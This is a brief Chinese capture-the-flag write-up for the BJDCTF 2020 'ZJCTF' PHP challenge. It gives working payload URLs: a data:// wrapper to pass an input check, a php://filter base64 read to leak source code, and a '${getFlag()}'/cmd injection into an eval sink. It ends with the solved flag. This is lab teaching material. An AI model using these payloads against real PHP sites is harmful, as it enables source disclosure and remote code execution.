BJDCTF 2020]ZJCTF,不过如此 | NSSCTF
![](https://nsh.asia/wp-content/uploads/2025/01/1736493110-1-1024x500.png)
涉及到php
先看题目
![](https://nsh.asia/wp-content/uploads/2025/01/1736493114-2-1024x294.png)
需要读取text的内容是否为I have a dream,且file参数里面不能含有flag
构造使用php伪协议进行读取
/?text=data://plain/text,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
得到base64
![](https://nsh.asia/wp-content/uploads/2025/01/1736493118-3-1024x149.png)
进行解码
![](https://nsh.asia/wp-content/uploads/2025/01/1736493122-4-1024x501.png)
发现命令执行漏洞:@eval($_GET[‘cmd’]);
/next.php?\S*=${getFlag()}&&cmd=phpinfo();
![](https://nsh.asia/wp-content/uploads/2025/01/1736493126-5-1024x525.png)
Ctrl+G搜索flag
![](https://nsh.asia/wp-content/uploads/2025/01/1736493130-6-1024x497.png)
NSSCTF{453a61d6-6601-4a35-bc99-2090d2f0a749}
Comments NOTHING